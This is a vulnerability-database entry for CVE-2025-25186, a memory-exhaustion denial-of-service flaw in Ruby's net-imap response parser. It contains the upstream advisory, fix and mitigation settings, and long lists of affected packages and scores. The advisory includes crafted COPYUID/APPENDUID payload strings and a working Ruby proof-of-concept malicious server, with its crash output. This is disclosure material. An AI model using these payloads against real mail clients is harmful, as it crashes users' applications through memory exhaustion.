Lookup for vulnerabilities affecting packages.

Vulnerability_idVCID-wyjh-cuuy-zbeb
Summary
Possible DoS by memory exhaustion in net-imap
### Summary
There is a possibility for denial of service by memory exhaustion in `net-imap`'s response parser.  At any time while the client is connected, a malicious server can send  can send highly compressed `uid-set` data which is automatically read by the client's receiver thread.  The response parser uses `Range#to_a` to convert the `uid-set` data into arrays of integers, with no limitation on the expanded size of the ranges.

### Details
IMAP's `uid-set` and `sequence-set` formats can compress ranges of numbers, for example: `"1,2,3,4,5"` and `"1:5"` both represent the same set.  When `Net::IMAP::ResponseParser` receives `APPENDUID` or `COPYUID` response codes, it expands each `uid-set` into an array of integers.  On a 64 bit system, these arrays will expand to 8 bytes for each number in the set.  A malicious IMAP server may send specially crafted `APPENDUID` or `COPYUID` responses with very large `uid-set` ranges.

The `Net::IMAP` client parses each server response in a separate thread, as soon as each responses is received from the server.  This attack works even when the client does not handle the `APPENDUID` or `COPYUID` responses.

Malicious inputs:

```ruby
# 40 bytes expands to ~1.6GB:
"* OK [COPYUID 1 1:99999999 1:99999999]\r\n"

# Worst *valid* input scenario (using uint32 max),
# 44 bytes expands to 64GiB:
"* OK [COPYUID 1 1:4294967295 1:4294967295]\r\n"

# Numbers must be non-zero uint32, but this isn't validated.  Arrays larger than
# UINT32_MAX can be created.  For example, the following would theoretically
# expand to almost 800 exabytes:
"* OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\r\n"
```

Simple way to test this:
```ruby
require "net/imap"

def test(size)
  input = "A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\r\n"
  parser = Net::IMAP::ResponseParser.new
  parser.parse input
end

test(99_999_999)
```

### Fixes

#### Preferred Fix, minor API changes
Upgrade to v0.4.19, v0.5.6, or higher, and configure:
```ruby
# globally
Net::IMAP.config.parser_use_deprecated_uidplus_data = false
# per-client
imap = Net::IMAP.new(hostname, ssl: true,
                               parser_use_deprecated_uidplus_data: false)
imap.config.parser_use_deprecated_uidplus_data = false
```

This replaces `UIDPlusData` with `AppendUIDData` and `CopyUIDData`.  These classes store their UIDs as `Net::IMAP::SequenceSet` objects (_not_ expanded into arrays of integers).  Code that does not handle `APPENDUID` or `COPYUID` responses will not notice any difference.  Code that does handle these responses _may_ need to be updated.  See the documentation for [UIDPlusData](https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html), [AppendUIDData](https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html) and [CopyUIDData](https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html).

For v0.3.8, this option is not available.
For v0.4.19, the default value is `true`.
For v0.5.6, the default value is `:up_to_max_size`.
For v0.6.0, the only allowed value will be `false`  _(`UIDPlusData` will be removed from v0.6)_.

#### Mitigation, backward compatible API
Upgrade to v0.3.8, v0.4.19, v0.5.6, or higher.

For backward compatibility, `uid-set` can still be expanded into an array, but a maximum limit will be applied.

Assign `config.parser_max_deprecated_uidplus_data_size` to set the maximum `UIDPlusData` UID set size.
When `config.parser_use_deprecated_uidplus_data == true`, larger sets will raise `Net::IMAP::ResponseParseError`.
When  `config.parser_use_deprecated_uidplus_data == :up_to_max_size`, larger sets will use `AppendUIDData` or `CopyUIDData`.

For v0.3,8, this limit is _hard-coded_ to 10,000, and larger sets will always raise `Net::IMAP::ResponseParseError`.
For v0.4.19, the limit defaults to 1000.
For v0.5.6, the limit defaults to 100.
For v0.6.0, the limit will be ignored  _(`UIDPlusData` will be removed from v0.6)_.

#### Please Note: unhandled responses
If the client does not add response handlers to prune unhandled responses, a malicious server can still eventually exhaust all client memory, by repeatedly sending malicious responses.  However, `net-imap` has always retained unhandled responses, and it has always been necessary for long-lived connections to prune these responses.  _This is not significantly different from connecting to a trusted server with a long-lived connection._  To limit the maximum number of retained responses, a simple handler might look something like the following:

  ```ruby
  limit = 1000
  imap.add_response_handler do |resp|
    next unless resp.respond_to?(:name) && resp.respond_to?(:data)
    name = resp.name
    code = resp.data.code&.name if resp.data.respond_to?(:code)
    if Net::IMAP::VERSION > "0.4.0"
      imap.responses(name) { _1.slice!(0...-limit) }
      imap.responses(code) { _1.slice!(0...-limit) }
    else
      imap.responses(name).slice!(0...-limit)
      imap.responses(code).slice!(0...-limit)
    end
  end
  ```

### Proof of concept

Save the following to a ruby file (e.g: `poc.rb`) and make it executable:
```ruby
#!/usr/bin/env ruby
require 'socket'
require 'net/imap'

if !defined?(Net::IMAP.config)
  puts "Net::IMAP.config is not available"
elsif !Net::IMAP.config.respond_to?(:parser_use_deprecated_uidplus_data)
  puts "Net::IMAP.config.parser_use_deprecated_uidplus_data is not available"
else
  Net::IMAP.config.parser_use_deprecated_uidplus_data = :up_to_max_size
  puts "Updated parser_use_deprecated_uidplus_data to :up_to_max_size"
end

size = Integer(ENV["UID_SET_SIZE"] || 2**32-1)

def server_addr
  Addrinfo.tcp("localhost", 0).ip_address
end

def create_tcp_server
  TCPServer.new(server_addr, 0)
end

def start_server
  th = Thread.new do
    yield
  end
  sleep 0.1 until th.stop?
end

def copyuid_response(tag: "*", size: 2**32-1, text: "too large?")
  "#{tag} OK [COPYUID 1 1:#{size} 1:#{size}] #{text}\r\n"
end

def appenduid_response(tag: "*", size: 2**32-1, text: "too large?")
  "#{tag} OK [APPENDUID 1 1:#{size}] #{text}\r\n"
end

server = create_tcp_server
port = server.addr[1]
puts "Server started on port #{port}"

# server
start_server do
  sock = server.accept
  begin
    sock.print "* OK test server\r\n"
    cmd = sock.gets("\r\n", chomp: true)
    tag = cmd.match(/\A(\w+) /)[1]
    puts "Received: #{cmd}"

    malicious_response = appenduid_response(size:)
    puts "Sending: #{malicious_response.chomp}"
    sock.print malicious_response

    malicious_response = copyuid_response(size:)
    puts "Sending: #{malicious_response.chomp}"
    sock.print malicious_response
    sock.print "* CAPABILITY JUMBO=UIDPLUS PROOF_OF_CONCEPT\r\n"
    sock.print "#{tag} OK CAPABILITY completed\r\n"

    cmd = sock.gets("\r\n", chomp: true)
    tag = cmd.match(/\A(\w+) /)[1]
    puts "Received: #{cmd}"
    sock.print "* BYE If you made it this far, you passed the test!\r\n"
    sock.print "#{tag} OK LOGOUT completed\r\n"
  rescue Exception => ex
    puts "Error in server: #{ex.message} (#{ex.class})"
  ensure
    sock.close
    server.close
  end
end

# client
begin
  puts "Client connecting,.."
  imap = Net::IMAP.new(server_addr, port: port)
  puts "Received capabilities: #{imap.capability}"
  pp responses: imap.responses
  imap.logout
rescue Exception => ex
  puts "Error in client: #{ex.message} (#{ex.class})"
  puts ex.full_message
ensure
  imap.disconnect if imap
end
```

Use `ulimit` to limit the process's virtual memory.  The following example limits virtual memory to 1GB:
```console
$ ( ulimit -v 1000000 && exec ./poc.rb )
Server started on port 34291
Client connecting,..
Received: RUBY0001 CAPABILITY
Sending: * OK [APPENDUID 1 1:4294967295] too large?
Sending: * OK [COPYUID 1 1:4294967295 1:4294967295] too large?
Error in server: Connection reset by peer @ io_fillbuf - fd:9  (Errno::ECONNRESET)
Error in client: failed to allocate memory (NoMemoryError)
/gems/net-imap-0.5.5/lib/net/imap.rb:3271:in 'Net::IMAP#get_tagged_response': failed to allocate memory (NoMemoryError)
        from /gems/net-imap-0.5.5/lib/net/imap.rb:3371:in 'block in Net::IMAP#send_command'
        from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'
        from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'
        from /gems/net-imap-0.5.5/lib/net/imap.rb:3353:in 'Net::IMAP#send_command'
        from /gems/net-imap-0.5.5/lib/net/imap.rb:1128:in 'block in Net::IMAP#capability'
        from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize'
        from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize'
        from /gems/net-imap-0.5.5/lib/net/imap.rb:1127:in 'Net::IMAP#capability'
        from /workspace/poc.rb:70:in '<main>'
```
Aliases
0
alias CVE-2025-25186
1
alias GHSA-7fc5-f82f-cx69
Fixed_packages
0
url pkg:deb/debian/ruby3.3@3.3.8-1?distro=trixie
purl pkg:deb/debian/ruby3.3@3.3.8-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-1%3Fdistro=trixie
1
url pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
purl pkg:deb/debian/ruby3.3@3.3.8-2?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/ruby3.3@3.3.8-2%3Fdistro=trixie
2
url pkg:gem/net-imap@0.3.8
purl pkg:gem/net-imap@0.3.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.8
3
url pkg:gem/net-imap@0.4.19
purl pkg:gem/net-imap@0.4.19
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.19
4
url pkg:gem/net-imap@0.5.6
purl pkg:gem/net-imap@0.5.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.6
Affected_packages
0
url pkg:gem/net-imap@0.3.2
purl pkg:gem/net-imap@0.3.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.2
1
url pkg:gem/net-imap@0.3.3
purl pkg:gem/net-imap@0.3.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.3
2
url pkg:gem/net-imap@0.3.4
purl pkg:gem/net-imap@0.3.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.4
3
url pkg:gem/net-imap@0.3.4.1
purl pkg:gem/net-imap@0.3.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.4.1
4
url pkg:gem/net-imap@0.3.5
purl pkg:gem/net-imap@0.3.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.5
5
url pkg:gem/net-imap@0.3.6
purl pkg:gem/net-imap@0.3.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.6
6
url pkg:gem/net-imap@0.3.7
purl pkg:gem/net-imap@0.3.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.3.7
7
url pkg:gem/net-imap@0.4.0
purl pkg:gem/net-imap@0.4.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1zvv-b8mk-fbd1
1
vulnerability VCID-5zsx-353j-8kax
2
vulnerability VCID-gsp4-pq1s-jkbw
3
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.0
8
url pkg:gem/net-imap@0.4
purl pkg:gem/net-imap@0.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4
9
url pkg:gem/net-imap@0.4.1
purl pkg:gem/net-imap@0.4.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.1
10
url pkg:gem/net-imap@0.4.2
purl pkg:gem/net-imap@0.4.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.2
11
url pkg:gem/net-imap@0.4.3
purl pkg:gem/net-imap@0.4.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.3
12
url pkg:gem/net-imap@0.4.4
purl pkg:gem/net-imap@0.4.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.4
13
url pkg:gem/net-imap@0.4.5
purl pkg:gem/net-imap@0.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.5
14
url pkg:gem/net-imap@0.4.6
purl pkg:gem/net-imap@0.4.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.6
15
url pkg:gem/net-imap@0.4.7
purl pkg:gem/net-imap@0.4.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.7
16
url pkg:gem/net-imap@0.4.8
purl pkg:gem/net-imap@0.4.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.8
17
url pkg:gem/net-imap@0.4.9
purl pkg:gem/net-imap@0.4.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.9
18
url pkg:gem/net-imap@0.4.9.1
purl pkg:gem/net-imap@0.4.9.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.9.1
19
url pkg:gem/net-imap@0.4.10
purl pkg:gem/net-imap@0.4.10
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.10
20
url pkg:gem/net-imap@0.4.11
purl pkg:gem/net-imap@0.4.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.11
21
url pkg:gem/net-imap@0.4.12
purl pkg:gem/net-imap@0.4.12
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.12
22
url pkg:gem/net-imap@0.4.13
purl pkg:gem/net-imap@0.4.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.13
23
url pkg:gem/net-imap@0.4.14
purl pkg:gem/net-imap@0.4.14
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.14
24
url pkg:gem/net-imap@0.4.15
purl pkg:gem/net-imap@0.4.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.15
25
url pkg:gem/net-imap@0.4.16
purl pkg:gem/net-imap@0.4.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.16
26
url pkg:gem/net-imap@0.4.17
purl pkg:gem/net-imap@0.4.17
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.17
27
url pkg:gem/net-imap@0.4.18
purl pkg:gem/net-imap@0.4.18
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.4.18
28
url pkg:gem/net-imap@0.5
purl pkg:gem/net-imap@0.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5
29
url pkg:gem/net-imap@0.5.0
purl pkg:gem/net-imap@0.5.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1zvv-b8mk-fbd1
1
vulnerability VCID-5zsx-353j-8kax
2
vulnerability VCID-gsp4-pq1s-jkbw
3
vulnerability VCID-jwy5-uf6y-j7ae
4
vulnerability VCID-rfhh-yjxe-3fds
5
vulnerability VCID-unx7-72n1-2bd4
6
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.0
30
url pkg:gem/net-imap@0.5.1
purl pkg:gem/net-imap@0.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.1
31
url pkg:gem/net-imap@0.5.2
purl pkg:gem/net-imap@0.5.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.2
32
url pkg:gem/net-imap@0.5.3
purl pkg:gem/net-imap@0.5.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.3
33
url pkg:gem/net-imap@0.5.4
purl pkg:gem/net-imap@0.5.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.4
34
url pkg:gem/net-imap@0.5.5
purl pkg:gem/net-imap@0.5.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-5zsx-353j-8kax
1
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:gem/net-imap@0.5.5
35
url pkg:rpm/redhat/ruby@3.3.8-10?arch=el10_0
purl pkg:rpm/redhat/ruby@3.3.8-10?arch=el10_0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-exq5-cnrm-3uhd
1
vulnerability VCID-n1ja-n53g-fycm
2
vulnerability VCID-wyjh-cuuy-zbeb
resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/ruby@3.3.8-10%3Farch=el10_0
References
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-25186.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-25186.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-25186
reference_id
reference_type
scores
0
value 0.00135
scoring_system epss
scoring_elements 0.32936
published_at 2026-05-09T12:55:00Z
1
value 0.00135
scoring_system epss
scoring_elements 0.32897
published_at 2026-05-07T12:55:00Z
2
value 0.00135
scoring_system epss
scoring_elements 0.32828
published_at 2026-05-05T12:55:00Z
3
value 0.00135
scoring_system epss
scoring_elements 0.3294
published_at 2026-04-29T12:55:00Z
4
value 0.00135
scoring_system epss
scoring_elements 0.33016
published_at 2026-04-26T12:55:00Z
5
value 0.00135
scoring_system epss
scoring_elements 0.33033
published_at 2026-04-24T12:55:00Z
6
value 0.00135
scoring_system epss
scoring_elements 0.33179
published_at 2026-04-21T12:55:00Z
7
value 0.00135
scoring_system epss
scoring_elements 0.33215
published_at 2026-04-18T12:55:00Z
8
value 0.00135
scoring_system epss
scoring_elements 0.33238
published_at 2026-04-16T12:55:00Z
9
value 0.00135
scoring_system epss
scoring_elements 0.33199
published_at 2026-04-13T12:55:00Z
10
value 0.00135
scoring_system epss
scoring_elements 0.33222
published_at 2026-04-12T12:55:00Z
11
value 0.00135
scoring_system epss
scoring_elements 0.33263
published_at 2026-04-11T12:55:00Z
12
value 0.00135
scoring_system epss
scoring_elements 0.33259
published_at 2026-04-09T12:55:00Z
13
value 0.00135
scoring_system epss
scoring_elements 0.33225
published_at 2026-04-08T12:55:00Z
14
value 0.00135
scoring_system epss
scoring_elements 0.33182
published_at 2026-04-07T12:55:00Z
15
value 0.00135
scoring_system epss
scoring_elements 0.3335
published_at 2026-04-04T12:55:00Z
16
value 0.00135
scoring_system epss
scoring_elements 0.33317
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-25186
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/ruby/net-imap
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ruby/net-imap
4
reference_url https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/
url https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35
5
reference_url https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/
url https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3
6
reference_url https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/
url https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022
7
reference_url https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-10T16:13:53Z/
url https://github.com/ruby/net-imap/security/advisories/GHSA-7fc5-f82f-cx69
8
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-25186.yml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/net-imap/CVE-2025-25186.yml
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-25186
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-25186
10
reference_url https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html
11
reference_url https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html
12
reference_url https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
1
value 6.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html
13
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103791
reference_id 1103791
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103791
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2344680
reference_id 2344680
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2344680
15
